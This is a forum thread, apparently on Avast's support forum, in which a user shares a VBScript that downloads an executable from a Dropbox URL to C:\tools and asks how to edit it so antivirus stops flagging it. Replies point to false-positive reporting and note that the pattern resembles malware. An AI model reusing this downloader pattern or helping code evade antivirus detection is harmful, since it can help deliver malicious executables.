[Resolved] VBS script detection

Hello,

I am using a VBS script which downloads a file using HTTP and saves it to a defined folder.

Code:


strFileURL = "http://dl.dropbox.com/u/1234567/folder/tools.exe"
    strHDLocation = "C:\tools\tools.exe"

    Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

    objXMLHTTP.open "GET", strFileURL, false
    objXMLHTTP.send()

    If objXMLHTTP.Status = 200 Then
      Set objADOStream = CreateObject("ADODB.Stream")
      objADOStream.Open
      objADOStream.Type = 1 'adTypeBinary

      objADOStream.Write objXMLHTTP.ResponseBody
      objADOStream.Position = 0    'Set the stream position to the start

      Set objFSO = Createobject("Scripting.FileSystemObject")
        If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
      Set objFSO = Nothing

      objADOStream.SaveToFile strHDLocation
      objADOStream.Close
      Set objADOStream = Nothing
    End if

    Set objXMLHTTP = Nothing

It is currently detected by Avast and 3 other not-so-popular AV programs.

Jotti detection rate:
http://virusscan.jotti.org/en/scanresult/5e6d67b3750bd8a4f0377f7b72d82d8d355239e5

Could you please advise me how to edit the code to make it more friendly to avast? To prevent the detection?

I have already attempted to submit it as a false via Avast interface however it was not fixed after 2 avi updates, so most likely detection is considered correct.
I am using VBS and not wget due to VBS being available on all Win platforms.

Thank you for your assistance.

It is only detected by two engines as GData is using avast as one of its two engines, and emsisoft is using ikarus virus engine

Thank you for the additional information.
Anything I can do about the detection?

you can upload a sample and report as false positve here

http://www.avast.com/contacts.
click the “General contact” button / then change subject to the one related to your case

or put it in a password protected zip file and send to avast lab. virus @ avast.com
mail subject: false positive
zip password: infected

Naturally, avast! would detect. There are some key reasons for this.

[ol]- The file is probably for personal use and therefore new to the signatures of avast

  • The VBS file downloads data (an executable) from a specific URL and saves it in the C:\ drive[/ol]

I can think of several ways to use this in a malicious way.

It’s somehow against Avast’s “Policies”.

VBS script is not detected with latest Avast avi update.

Not sure about the rules on these forums but this thread can be considered resolved/closed.

The topics aren’t closed as such.

You can use the Modify button in your First post in this topic and add [Resolved] to the topic’s Title.